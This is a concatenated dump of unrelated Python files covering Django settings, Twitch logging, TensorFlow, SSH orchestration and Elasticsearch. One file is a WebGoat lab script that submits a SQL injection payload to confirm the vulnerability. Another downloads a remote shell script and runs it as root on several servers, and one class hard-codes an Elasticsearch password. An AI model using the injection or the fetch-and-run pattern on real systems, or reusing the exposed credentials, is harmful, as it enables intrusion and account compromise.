        self._need_write_sockets.remove(socket_obj)
|
983,736 | dfb1620d8198a2d9cfdf1739eeb761cc3a65123f | '''
def outer(func):
print('1...')
def inner():
print('2...')
func()
print('3...')
return inner
@outer
def save():
print('do save...')
'''
'''
save头部加@outer,python解析器做了哪些事?
save = outer(save)
'''
'''
多个装饰器顺序。
先开始,后结束
'''
#定义函数:完成包裹数据
def makeBold(fn):
    """Decorator that wraps fn's return value in HTML <b>...</b> tags."""
    def bold_wrapper():
        inner_text = fn()
        return "<b>" + inner_text + "</b>"
    return bold_wrapper
#定义函数:完成包裹数据
def makeItalic(fn):
def wrapped():
return "<i>" + fn() + "</i>"
return wrapped
@makeBold
def test1():
    """Greeting wrapped in <b> tags by the makeBold decorator."""
    return "hello world-1"
@makeItalic
def test2():
    """Greeting wrapped in <i> tags by the makeItalic decorator."""
    return "hello world-2"
# Stacked decorators apply bottom-up: makeItalic wraps first, then makeBold,
# yielding <b><i>hello world-3</i></b>.
@makeBold
@makeItalic
def test3():
    """Greeting wrapped in <b><i>...</i></b> by both decorators."""
    return "hello world-3"
# Show the decorated outputs: bold, italic, then bold+italic.
print(test1())
print(test2())
print('***************************************华丽的分割线***************************************')
print(test3())
|
983,737 | f7e4cd26caa5021001e0daa6291aea38e3b0914e | """ This api readers the headers in the request and determines the IP"""
|
983,738 | 8bb26b6ebc40e5a995168e0cda62e51dd43ec5ec | import pika
import json
credentials = pika.PlainCredentials('TestUser', '1234') # MQ username and password
# A virtual host must be passed via virtual_host; the default '/' may be omitted.
connection = pika.BlockingConnection(pika.ConnectionParameters(host = '127.0.0.1',port = 5672,virtual_host = '/',credentials = credentials))
channel=connection.channel()
# Declare the exchange (created if it does not exist); the exchange decides which
# queue a message is routed to. durable=True makes the exchange persistent.
channel.exchange_declare(exchange = 'python-test-direct',durable = True, exchange_type='direct')
for i in range(10):
    message=json.dumps({'OrderId':"1000%s"%i})
    # Publish with routing_key 'OrderId'. delivery_mode=2 persists the message
    # in the queue; delivery_mode=1 would make it non-persistent.
    channel.basic_publish(exchange = 'python-test-direct',routing_key = 'OrderId',body = message,
                          properties=pika.BasicProperties(delivery_mode = 2))
    print(message)
connection.close()
983,739 | 174fcea0558a0cc2b7d62cba5d571a63241ae1dd | # Copyright 2019 Google LLC.
"""Tracks the cursor in a video.
Given a template image for a cursor, adds a stream containing coordinates of the
cursor in the video.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from video_processing import stream_processor
import cv2
class CursorTracker(stream_processor.ProcessorBase):
  """Processor tracking cursor in the video.

  Template-matches a cursor image against each video frame (after
  subtracting a static background image) and, on a match above the
  threshold, emits the cursor centre coordinates on a separate stream.
  """

  def __init__(self, configuration):
    """Reads the stream names and cursor template path from configuration."""
    self._video_stream_name = configuration.get('video_stream_name', 'video')
    self._cursor_stream_name = configuration.get('cursor_stream_name', 'cursor')
    self._background_stream_name = configuration.get('background_stream_name',
                                                     'background_image')
    self._cursor_file = configuration.get('cursor_template_file', '')
    self._background_image = None
    self._cursor_threshold = 0
    self._cursor_width = 0
    self._cursor_height = 0
    self._cursor_log = []

  def open(self, stream_set):
    """Loads the cursor template and registers the cursor stream header."""
    self._cursor_template = cv2.imread(self._cursor_file, 0)
    self._cursor_width, self._cursor_height = self._cursor_template.shape[::-1]
    stream_set.stream_headers[
        self._cursor_stream_name] = stream_processor.StreamHeader(
            frame_data_type=str,
            header_data=stream_processor.CursorStreamHeader(
                self._cursor_file, self._cursor_width, self._cursor_height,
                self._cursor_log, self._cursor_template))
    return stream_set

  def process(self, frame_set):
    """Adds a cursor-coordinate frame for a video frame when a match is found.

    Caches the first background frame seen, then matches the template
    against (frame - background).
    """
    if (frame_set.get(self._background_stream_name, False) and
        self._background_image is None):
      self._background_image = cv2.cvtColor(
          frame_set[self._background_stream_name].data, cv2.COLOR_BGR2GRAY)
    if frame_set.get(self._video_stream_name, False):
      frame_index = frame_set[self._video_stream_name].index
      video_frame = frame_set[self._video_stream_name].data
      gray_frame = cv2.cvtColor(video_frame, cv2.COLOR_BGR2GRAY)
      if self._background_image is None:
        # Bug fix: the original printed this error but then fell through and
        # passed None to cv2.subtract, which raises. Skip matching for this
        # frame instead and pass the frame set through unchanged.
        print('ERROR: No valid background image found.')
        return frame_set
      frame = cv2.subtract(gray_frame, self._background_image)
      match = cv2.matchTemplate(frame, self._cursor_template, cv2.TM_CCOEFF)
      _, max_val, _, max_loc = cv2.minMaxLoc(match)
      # max_loc is the best match location when using the TM_CCOEFF method.
      if max_val > self._cursor_threshold:
        frame_set[self._cursor_stream_name] = stream_processor.Frame(
            frame_index, [
                int(max_loc[0] + self._cursor_width / 2),
                int(max_loc[1] + self._cursor_height / 2)
            ])
    return frame_set

  def close(self):
    """No end-of-stream frames to flush."""
    return []
|
983,740 | b9bd2b59a9addaca1e53c506847987c82d6b1698 | from setuptools import setup, find_packages
# Pin install_requires to whatever requirements.txt lists, one package per line.
with open('requirements.txt', 'r') as f:
    required = f.read().splitlines()
# pkgs = find_packages()
# print(f"found packages: {pkgs}")
setup(name='luxmeters', version='0.1.0', author='Martin Maslyankov', author_email='m.maslyankov@me.com',
      # packages=pkgs,
      packages=['luxmeters'],
      install_requires=required,
      # scripts=[],
      url='http://pypi.python.org/pypi/luxmeters/',
      license='LICENSE.txt',
      description='A package giving you interface for several luxmeter devices',
      long_description=open('README.txt').read(),
      )
|
983,741 | 4213d53acd9a78e5698052ed3ac4f3b1be352d7b | # -*- coding: utf-8 -*-
"""
Client Op
Created on Sat Jul 20 14:26:14 2019
gets credectials from cred.py and password
takes search terms and sends requests to mendeley
exports returned objects to storage.
@author: vince
"""
# Import libraries
import cred
from mendeley import Mendeley
def startSession():
    '''
    Initializes credential flow and returns session object for search
    '''
    creds = cred.getCred()
    mendeley = Mendeley(creds['client_id'],
                        client_secret=creds['client_secret'])
    flow = mendeley.start_client_credentials_flow()
    session = flow.authenticate()
    print('Session open command sent')
    return session
def closeSession(session):
    """Close the given Mendeley session and log that the request was sent."""
    session.close()
    print('Close session command sent')
if __name__ == "__main__":
mendeley_session = startSession()
print(type(mendeley_session))
|
983,742 | 2e4a0eaa572ad3d437a15371ba6bf2f994c2ae93 | import tensorflow as tf
import numpy as np
# Fit y = W*x + b to synthetic data with true W=0.1, b=0.3 (TF1 graph API).
x_data = np.float32(np.random.rand(1,100))
y_data = np.dot([0.1],x_data)+0.3
# Build the linear model.
W = tf.Variable(tf.random_uniform([1],-1.0,1.0))
b = tf.Variable(tf.random_uniform([1],-1.0,1.0))
hypothesis = W*x_data +b
# Minimise the mean squared error.
cost = tf.reduce_mean(tf.square(hypothesis-y_data))
a=tf.Variable(0.5)
optimizer = tf.train.GradientDescentOptimizer(a)
train = optimizer.minimize(cost)
# Initialise the variables and run the training loop.
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
for step in range(4001):
    sess.run(train)
    if step % 20 == 0:
        print(step,sess.run(cost),sess.run(W),sess.run(b))
|
983,743 | 038ee7c144f70094a60a16097e40626a2c75109e | import os
from dotenv import load_dotenv
load_dotenv()  # Load env variables
# NOTE(review): the hard-coded fallback SECRET_KEY must never be used in
# production — make SECRET_KEY a required env var there.
SECRET_KEY = os.getenv(
    'SECRET_KEY', '+y6bxh9b)msc$6@k))6f@p^-ely9k#nfqcoidncb2#knf%%!@l'
)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'app',
    'graphene_django',
    'django_filters',
    'corsheaders',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    # CorsMiddleware must come before CommonMiddleware.
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'swapi.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'swapi.wsgi.application'
# PostgreSQL connection, fully driven by environment variables.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': os.getenv('POSTGRES_DB', ''),
        'USER': os.getenv('POSTGRES_USER', ''),
        'PASSWORD': os.getenv('POSTGRES_PASSWORD', ''),
        'HOST': os.getenv('POSTGRES_HOST', ''),
        'PORT': os.getenv('POSTGRES_PORT', ''),
        'ATOMIC_REQUESTS': True
    }
}
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation'
                '.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation'
                '.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation'
                '.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation'
                '.NumericPasswordValidator',
    },
]
# Internationalisation / timezone.
LANGUAGE_CODE = 'en'
TIME_ZONE = os.getenv('TZ', 'America/Bogota')
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# NOTE(review): allowing every CORS origin is only appropriate in development.
CORS_ORIGIN_ALLOW_ALL = True
|
983,744 | a1136fb7d08e484036a70b807692f31c5977aae1 | try:
import neuroglancer
except:
pass
def ngLayer(data, res, oo=(0, 0, 0), tt='segmentation'):
    """Build a neuroglancer LocalVolume from a zyx-ordered array.

    Args:
        data: volume indexed z, y, x; transposed to x, y, z for display.
        res: per-axis voxel resolution in nm.
        oo: voxel offset of the volume origin. Fixed: the original used a
            mutable list default ([0,0,0]); a tuple avoids the shared
            mutable-default pitfall while remaining sequence-compatible.
        tt: neuroglancer volume type, e.g. 'segmentation' or 'image'.
    """
    # input zyx -> display xyz
    dim = neuroglancer.CoordinateSpace(names=['x', 'y', 'z'],
                                       units='nm',
                                       scales=res)
    return neuroglancer.LocalVolume(data.transpose([2, 1, 0]), volume_type=tt,
                                    dimensions=dim, voxel_offset=oo)
|
983,745 | 252dd0b529e714917fc1a808bd38119b79fe6c32 | from pssh.clients import ParallelSSHClient
from pssh.clients import SSHClient
import time
# init params, write down servers IPs below
# Orchestrates a multi-server dexp2p spam test: provision nodes over SSH,
# build an ip_list on each host, start the network host-by-host, spam, and
# finally collect stats. Fill in server IPs below before running.
hosts = []
amount_of_nodes_per_host = 10
spam_duration_seconds = 5
# 1 - Preparing nodes
command = "rm -rf * && wget https://raw.githubusercontent.com/tonymorony/komodo-cctools-python/master/scripts/dexp2p/multi-server/prepare_dexp2p_node_ms.sh " \
          "&& chmod u+x prepare_dexp2p_node_ms.sh && ./prepare_dexp2p_node_ms.sh"
client = ParallelSSHClient(hosts, user="root")
output = client.run_command(command, sudo=True)
for node in output:
    for line in output[node]['stdout']:
        print(line)
# 2 - Preparing "started nodes" file on each server
i = 0
for host in hosts:
    print("Preparing file on node " + str(i+1))
    non_parallel_client = SSHClient(host, user="root")
    if i == 0:
        non_parallel_client.run_command("touch ip_list")
    else:
        line_with_hosts = ""
        # NOTE(review): this inner loop shadows the outer `host` variable,
        # and the `echo -e` argument is unquoted, so embedded newlines are
        # split by the shell — confirm intended behaviour.
        for host in hosts[:i]:
            line_with_hosts += host + "\n"
        non_parallel_client.run_command("echo -e " + line_with_hosts + " >> ip_list")
    i = i + 1
print("Test nodes software prepared. Starting network.")
# 3 - Starting network (need to do one by one)
i = 0
for host in hosts:
    print("Starting network on node " + str(i+1))
    non_parallel_client = SSHClient(host, user="root")
    # The very first node bootstraps the network; the rest join it.
    if i == 0:
        is_first_env = "export IS_FIRST=True"
    else:
        is_first_env = "export IS_FIRST=False"
    ip_env = "NODE_IP=" + host
    network_start_command = "export NODESAMOUNT=" + str(amount_of_nodes_per_host) + " && " + is_first_env \
                            + " && " + ip_env + " && " + "python3 clients_spawn_multi_server.py"
    output = non_parallel_client.run_command(network_start_command, sudo=True)
    # Allow ~3 s per spawned node before starting the next server.
    time.sleep(3 * amount_of_nodes_per_host + 3)
    i = i + 1
print("Network setup completed. Starting to spam.")
# 3 - Starting spam
for host in hosts:
    non_parallel_client = SSHClient(host, user="root")
    output = non_parallel_client.run_command("export NODESAMOUNT=" + str(amount_of_nodes_per_host) + " && ./dexp2p_start_spam_ms.sh " + host + " " + str(spam_duration_seconds), sudo=True)
time.sleep(spam_duration_seconds)
# 4 - Collecting results
print("Spam is finished. Collecting results")
client = ParallelSSHClient(hosts, user="root")
output = client.run_command("export NODESAMOUNT=" + str(amount_of_nodes_per_host) + " && python3 get_stats.py", sudo=True)
for node in output:
    for line in output[node]['stdout']:
        print(line)
|
983,746 | 0b144352a1a4096b6c8d830323a05f6533fb203d | n = list(map(int,input()))
# A number is divisible by 9 iff its digit sum is. Use integer modulo
# directly instead of the original's float-division vs floor-division
# equality trick, which is both obscure and fragile for large digit sums
# (float precision).
if sum(n) % 9 == 0:
    print("Yes")
else:
    print("No")
|
983,747 | 45c222560ebba25d370a1f43f796d665ec7a79a8 |
import sys
import os
import random
import csv
import tensorflow as tf
import numpy as np
from PIL import Image
import cv2
FAC_DATA = 'fac_data'
IMAGE_DIR = 'Images'
AU_DIR = 'AUs'
BUFFER_SIZE = 50
TRAINING_PERCENT = 70
TESTING_PERCENT = (100 - TRAINING_PERCENT) / 2.0
VALIDATION_PERCENT = (100 - TRAINING_PERCENT) / 2.0
AUS = [1,2,4,5,6,9,12,15,17,20,25,26]
TRAINING_DIR = 'training'
TESTING_DIR = 'testing'
VALIDATION_DIR = 'validation'
def _int64_feature(value):
    """Wrap a list of ints as a tf.train.Feature int64_list."""
    return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
    """Wrap a single bytes value as a tf.train.Feature bytes_list."""
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _float_feature(value):
    """Wrap a list of floats as a tf.train.Feature float_list.

    Bug fix: the original passed a FloatList as the ``bytes_list`` field,
    which raises a TypeError at proto construction time; float values
    belong in ``float_list``.
    """
    return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def write_records(root_dir, dest_dir):
    """Convert the FAC image/AU dataset to one TFRecord per frame.

    Expects root_dir to contain an 'Images' directory with one
    sub-directory per subject and an 'AUs' directory with a CSV per
    subject (same name as the image sub-directory). Each frame becomes a
    single-example TFRecord placed randomly into training/testing/
    validation under dest_dir according to the split percentages.
    """
    print("Beginning writing")
    #Images divided into subjects, so loop over those dirs
    images_dir = os.path.join(root_dir, IMAGE_DIR)
    if not os.path.isdir(images_dir):
        raise ValueError("There is no 'Images' directory in the specified dataset directory")
    for subj in sorted(os.listdir(images_dir)):
        print("Processing subject:%s" % subj)
        #Subject image dirs have same name as csv files...
        subj_image_dir = os.path.join(images_dir, subj)
        subject_csv_file = os.path.join(root_dir, AU_DIR, subj)
        subject_ptr = open(subject_csv_file)
        #Read in the CSV
        labels = _get_labels_for_subject(subject_ptr)
        #then for every image per subject read it in
        for i, filename in enumerate(sorted(os.listdir(subj_image_dir))):
            print("Processing %s" % filename)
            #Load the image
            file_path = os.path.join(subj_image_dir, filename)
            # Frame number is the third underscore-separated token, minus
            # the 4-char extension (e.g. subj_sess_0001.png -> 1).
            frame = int(filename.split('_')[2][:-4])
            image = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE)
            # Random train/test/validation split per frame.
            location = TRAINING_DIR
            rand = random.random() * 100
            if rand > TRAINING_PERCENT + VALIDATION_PERCENT:
                location = VALIDATION_DIR
            elif rand > TRAINING_PERCENT:
                location = TESTING_DIR
            #Write to tfrecord
            record_path = os.path.join(dest_dir, location, filename + '.tfrecord')
            print("Writing %s" % record_path)
            writer = tf.python_io.TFRecordWriter(record_path)
            example = tf.train.Example(features=tf.train.Features(feature={
                'label': _int64_feature(labels[i]),
                'image': _bytes_feature(image.tostring())
            }))
            writer.write(example.SerializeToString())
            writer.close()
def _get_labels_for_subject(file_ptr):
""" Reads the CSV file and organizes it into a list
:param file_ptr: pointer to a subject's csv
:type file_ptr: file pointer
:returns: list of FACLabel objects
"""
labels = []
#Open CSC
reader = csv.reader(file_ptr, delimiter=',')
for i, row in enumerate(reader):
facs = []
for j, intensity in enumerate(row):
if j == 0:
continue
facs.append(int(intensity))
labels.append(facs)
return labels
def main():
    """CLI entry point: write_records(root_dir=argv[1], dest_dir=argv[2])."""
    # params:
    # root_dir: The root directory of the dataset to be converted
    # dest_dir: The destination directory for the dataset
    root_dir = sys.argv[1]
    dest_dir = sys.argv[2]
    write_records(root_dir, dest_dir)
if __name__ == '__main__':
    main()
983,748 | 920379f922f03ec9e8a11c11922e541a5bda9e50 | from twitchAPI.twitch import Twitch
from twitch import TwitchClient
import requests
import pandas as pd
import json
import sched, time
import psycopg2
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
import subprocess
##twitch api input variables
client_ID = ''
secret = ''
#create instance of twitch API
twitch = Twitch(client_ID, secret)
twitch.authenticate_app([])
client = TwitchClient(client_ID)
####establish connection
db_string = "postgres://postgres:PW@localhost:5432/twitch_project"
db = create_engine(db_string, pool_pre_ping=True)
session = sessionmaker(bind=db)()
##write to games tables, write to views table
# Every 10 minutes, pull the top-100 games and insert one viewers row each.
while True:
    time.sleep(600)
    curr_time = []
    name = []
    game_viewers = []
    times = []
    query = []
    i = 0
    games = client.games.get_top(100)
    curr_time = time.strftime("%Y-%m-%d %H:%M:%S",time.gmtime())
    # NOTE(review): `i < 99` inserts only 99 of the 100 fetched games —
    # confirm whether the last entry should be included. The INSERT is
    # built by string concatenation from API data; parameterised queries
    # would be safer (quoting/injection).
    while i < 99:
        query = 'INSERT INTO views (game_id,viewers,game_name,time) VALUES (' + str(games[i]['game']['id']) + ',' + ((str([games[i]['viewers']])).replace('[','')).replace(']','') +',' + '\'' + str(games[i]['game']['name']).replace('\'','') + '\'' + ',' + 'NOW()' +')'
        #print(query)
        #send viewership information straight to views table
        session.connection().connection.set_isolation_level(0)
        session.execute(query)
        session.connection().connection.set_isolation_level(1)
        #df_viewers = df_viewers.append(pd.DataFrame({"game_name":[games[i]['game']['name']],"viewers":[games[i]['viewers']],"time":[curr_time]}), ignore_index=True, sort=False)
        i+=1
|
983,749 | 5b370662bea2535818199952677c2b0d9c2e734e | import requests
import re
# Python 2 script (print statements, `unicode` builtin): logs into a local
# WebGoat instance, locates the "LAB: SQL Injection" lesson in the menu
# JSON, submits a string SQL-injection payload, and exits 0 if the lesson
# reports the vulnerability as completed.
# Request session object
s = requests.Session()
s.stream = True
# --[STEP 00 ]--
# Request login page
url = "http://127.0.0.1:8080/WebGoat/login.mvc"
first = s.get(url)
# --[ STEP 01 ]--
# Log into WebGoat
url2 = "http://127.0.0.1:8080/WebGoat/j_spring_security_check"
payload = {'username':'webgoat','password':'webgoat'}
login = s.post(url2, data=payload)
# --[ STEP 02 ]--
# Figure out which menu item is "Http Basics"
# --[ STEP 3 ]--
# Request the lesson for General => Http Basics
lessonurlb = "http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc"
lessonurl = "http://127.0.0.1:8080/WebGoat/attack?Screen=32&menu=1100"
lesson = s.get(lessonurl)
lessonb = s.get(lessonurlb)
found = False
exploit = {}
screennum = 0
# Walk the menu JSON: find the "Injection Flaws" category, then its
# "LAB: SQL Injection" child entry.
for i,j in enumerate(lessonb.json()):
    for a,b in j.items():
        if (type(b) is unicode and b == "Injection Flaws"):
            found = True
        if (found == True and type(b) is list):
            for lista in b:
                for c,d in lista.items():
                    if (type(c) is unicode and d == "LAB: SQL Injection"):
                        exploit = lista
                        break
            found = False
    if (found):
        break
# Simple regex
reg = re.compile(u'attack\?Screen=([\d]+)')
screen_str = ""
# Pull the lesson's attack link out of the menu entry to get its Screen id.
for n, v in exploit.items():
    if (type(v) is list):
        for li in v:
            if type(li) is dict:
                for key, val in li.items():
                    if (key == "link"):
                        screen_str = val
screen_list = re.findall(reg, screen_str)
screen_num = screen_list[0]
# --[ STEP 4 ]--
# Submit the attack to the General => Http Basics page
#ATTACK=`echo -n "1"`
attack_url = "http://127.0.0.1:8080/WebGoat/start.mvc"
att = s.get(attack_url)
attack_url2 = "http://127.0.0.1:8080/WebGoat/attack?Screen=" + str(screen_num) + "&menu=1100"
att_pay = {'employee_id':'112','password':"smith' OR '1' = '1"}
att_login = s.post(attack_url2, data=att_pay)
isStage1 = False
verify = False
# Check the lesson's stage list: the attack worked if "Stage 1: String SQL
# Injection" is marked complete.
listb = exploit.items()
for child in listb[-2][1]:
    for ele,ele2 in child.items():
        if (ele2 == "Stage 1: String SQL Injection"):
            isStage1 = True
        if (ele == "complete" and ele2 == True):
            verify = True
    if (isStage1):
        break
# Purposefully fail for testing purposes
#ATTACK=`echo -n "1"`
# --[ STEP 6 ]--
# Set the correct exit code
# It will return a
# - 0 (error) if the vulnerability is present
# - 1 (success) if the vulnerability is fixed (aka not present)
if (verify):
    print "Attack Successful"
    exit(0)
else:
    print "vuln-15 not present"
    exit(1)
|
983,750 | dc687d4a9f57444e78a714d9c0c075ebed061280 | from elasticsearch import Elasticsearch
class ES:
    """Builds qrel (relevance-judgement) and ranked-list files for hw5.

    Merges three assessors' judgements stored in the 'hw5' index into a
    binary qrel, and queries the 'hw3' index for per-query ranked lists.
    """
    def __init__(self):
        # NOTE(review): credentials are hard-coded here — move them to
        # configuration/env before sharing. Also note the kwarg is spelled
        # 'clould_id' (typo); Elasticsearch ignores unknown kwargs or the
        # value is unused since hosts= is given — confirm intent.
        self.hosts = ["https://f2ff43d409574698a747eaa43256d1e0.northamerica-northeast1.gcp.elastic-cloud.com:9243/"]
        self.cloud_id = ""
        self.index = "hw5"
        self.es = Elasticsearch(hosts=self.hosts, timeout=60, clould_id=self.cloud_id, http_auth=('elastic', 'nRGUXlzD1f8kOT63iLehSG9a'))
        # Per-query binary judgements, raw averaged scores, and ranked lists.
        self.qrel = {"151901": {}, "151902": {}, "151903": {}}
        self.qrel_raw = {"151901": {}, "151902": {}, "151903": {}}
        self.qrel_temp = {}
        self.rank_list = {"151901": [], "151902": [], "151903": []}
        self.query = ["College of Cardinals", "Ten Commandments", "Recent Popes"]
        self.query_id = ["151901", "151902", "151903"]
    def get_qrel(self):
        """Load every assessment document from the hw5 index into qrel_temp."""
        temp = self.es.search(index=self.index,
                              body={
                                  "query": {
                                      "match_all": {}
                                  }
                              })['hits']['hits']
        for item in temp:
            key = item['_id']
            value = item['_source']['relevance']
            self.qrel_temp[key] = value
    def get_rank_list(self):
        """Query the hw3 index for each topic and record (doc, score) pairs."""
        for idx, q in enumerate(self.query):
            print("Reading ranked list: " + str(idx+1))
            q_id = self.query_id[idx]
            temp = self.es.search(index="hw3",
                                  body={
                                      "size": 1200,
                                      "query": {
                                          "match": {
                                              "text_content": q
                                          }
                                      },
                                      "_source": ""
                                  })['hits']['hits']
            for item in temp:
                self.rank_list[q_id].append({item['_id']: item['_score']})
            # i = 0
            # for item in temp:
            #     if i <= 200:
            #         if item['_id'] in self.qrel[q_id]:
            #             self.rank_list[q_id].append({item['_id']: item['_score']})
            #             i += 1
            #     else:
            #         self.rank_list[q_id].append({item['_id']: item['_score']})
    def output_qrel(self):
        """Average the three assessors' scores, binarise (>=1 -> 1) and write
        qrel.txt / qrel_raw.txt in TREC qrel format."""
        for q_id in self.query_id:
            # Assessor document ids follow "<Name>, <query_id>" patterns.
            record = "Yiyun_Zhu, " + q_id
            for key in self.qrel_temp[record]:
                s1 = self.qrel_temp[record][key]
                s2 = self.qrel_temp["Zhuocheng_Lin,+" + q_id][key]
                s3 = self.qrel_temp["Jiayi_Liu, " + q_id][key]
                final_s = (s1 + s2 + s3) / 3
                self.qrel_raw[q_id][key] = final_s
                if final_s < 1:
                    self.qrel[q_id][key] = 0
                else:
                    self.qrel[q_id][key] = 1
        with open("./data/qrel.txt", "a", encoding="utf-8") as f:
            for q_id in self.qrel:
                for doc in self.qrel[q_id]:
                    rel = self.qrel[q_id][doc]
                    line = "{0} 0 {1} {2}\n".format(q_id, doc, rel)
                    f.write(line)
        with open("./data/qrel_raw.txt", "a", encoding="utf-8") as f:
            for q_id in self.qrel_raw:
                for doc in self.qrel_raw[q_id]:
                    rel = self.qrel_raw[q_id][doc]
                    line = "{0} 0 {1} {2}\n".format(q_id, doc, rel)
                    f.write(line)
    def output_rank_list(self):
        """Write the ranked lists in TREC run format (rank starts at 1)."""
        with open("./data/ranked_list.txt", "a", encoding="utf-8") as f:
            for q_id in self.rank_list:
                for idx, item in enumerate(self.rank_list[q_id]):
                    for url in item:
                        line = '{0} Q0 {1} {2} {3} Exp\n'.format(q_id, url, idx+1, str(item[url]))
                        f.write(line)
# Driver: build qrels first, then the ranked lists.
my_es = ES()
my_es.get_qrel()
my_es.output_qrel()
my_es.get_rank_list()
my_es.output_rank_list()
|
983,751 | 9069221a0641fae6337481c033db5863fa20e4d9 | tot = 0
ind = 0
# Read (label, number) line pairs from stdin until input ends, then print
# the running average of the numbers with one decimal place.
while True:
    try:
        s = input()          # label line (read to advance the stream)
        ind += 1
        n = int(input())     # value line
        tot += n
    except (EOFError, ValueError):
        # Fix: the original bare `except:` swallowed every exception, and
        # on completely empty input the division raised ZeroDivisionError
        # from inside the handler. Narrow to end-of-input / bad number and
        # guard the empty case.
        if ind:
            print("%.1f" % (tot/ind))
        break
|
983,752 | d470cdc6c627350b3917ec6bb16e5a88e9220761 | #!flask/bin/python
# Copyright 2020 Luis Blazquez Miñambres (@luisblazquezm), Miguel Cabezas Puerto (@MiguelCabezasPuerto), Óscar Sánchez Juanes (@oscarsanchezj) and Francisco Pinto-Santos (@gandalfran)
# See LICENSE for details.
from flask_restx import Api
# Single shared Flask-RESTX Api instance for the service; namespaces are
# registered against this object elsewhere.
api = Api(version='1.0',
          title='SOA final project',
          description="**SOA project's Flask RESTX API**")
983,753 | 477c52cc7858d93819d3ecf6c6db21c30eca922c | from googleapiclient import discovery
from pprint import pprint
from project_deletion import variable
class projectdeletion:
    """Wrapper around the Cloud Resource Manager project-delete call."""
    def project_deletion(self):
        """Request deletion of the project configured in `variable`.

        GCP shuts the project down immediately and permanently deletes it
        after the 30-day recovery window.
        """
        service = discovery.build('cloudresourcemanager', 'v1', credentials=variable.credentials)
        request = service.projects().delete(projectId=variable.projectid)
        request.execute()
        pprint("Project has been shutdown now and it will get deleted after 30days")
|
983,754 | 800023217232eaa1c88819da6ed616d1999be948 | # Generated by Django 2.1.7 on 2019-02-21 22:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial catalog migration: Article, Author, Journal plus the
    Article->Author FK and Article<->Journal M2M. Auto-generated; do not
    hand-edit operations after it has been applied."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Article',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('text', models.TextField(help_text='Text of the article')),
                ('date', models.DateField(auto_now_add=True, help_text='Date when article was published')),
            ],
        ),
        migrations.CreateModel(
            name='Author',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=100)),
                ('last_name', models.CharField(max_length=100)),
            ],
            options={
                'ordering': ['last_name', 'first_name'],
            },
        ),
        migrations.CreateModel(
            name='Journal',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(help_text='Enter a journal name (e.g. Science Fiction)', max_length=200)),
            ],
        ),
        migrations.AddField(
            model_name='article',
            name='author',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='catalog.Author'),
        ),
        migrations.AddField(
            model_name='article',
            name='journal',
            field=models.ManyToManyField(help_text='Journal in which the article is published', to='catalog.Journal'),
        ),
    ]
|
983,755 | 70b5d1b2c567503d958423c77fbc975731c15fc9 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 29 12:49:50 2018
@author: Ruman
También es posible procesar cadenas que representen un documento
XML usando el método fromstring,
que toma como argumento la cadena que representa el documento XML
"""
from xml.etree import ElementTree as ET
# Sample XML catalogue parsed from a string (content intentionally Spanish).
cadena = '''
<catalogo>
    <Libro isbn="1111">
        <titulo>El quijote</titulo>
        <autor>Cervantes</autor>
        <precio>1200</precio>
    </Libro>
    <Libro isbn="2222">
        <titulo>El si de las Niñas</titulo>
        <autor>Fernando de Rojas</autor>
        <precio>1800</precio>
    </Libro>
    <Libro isbn="3333">
        <titulo>Historia de una escalera</titulo>
        <autor>Buero vallejo</autor>
        <precio>200</precio>
    </Libro>
</catalogo>
'''
# fromstring returns the root element, e.g. <Element 'catalogo' at 0x117deea98>
doc=ET.fromstring(cadena)
for nodo in doc.findall("Libro"):
    # findall returns every direct "Libro" child, but not their descendants.
    print (nodo.tag, nodo.attrib)
983,756 | 72f058595b4689d9e57527321f17102d5f685e22 | from pydy import *
from sympy import symbols, S, Symbol, Function, sin, cos, tan, Matrix, eye, \
Rational, pprint, trigsimp, expand
# Shared fixtures: a Newtonian frame with six generalised coordinates and a
# chain of body-fixed rotations N -> A (about 3) -> B (about 1) -> C (about 2).
N = NewtonianReferenceFrame('N')
q, qd = N.declare_coords('q', 6)
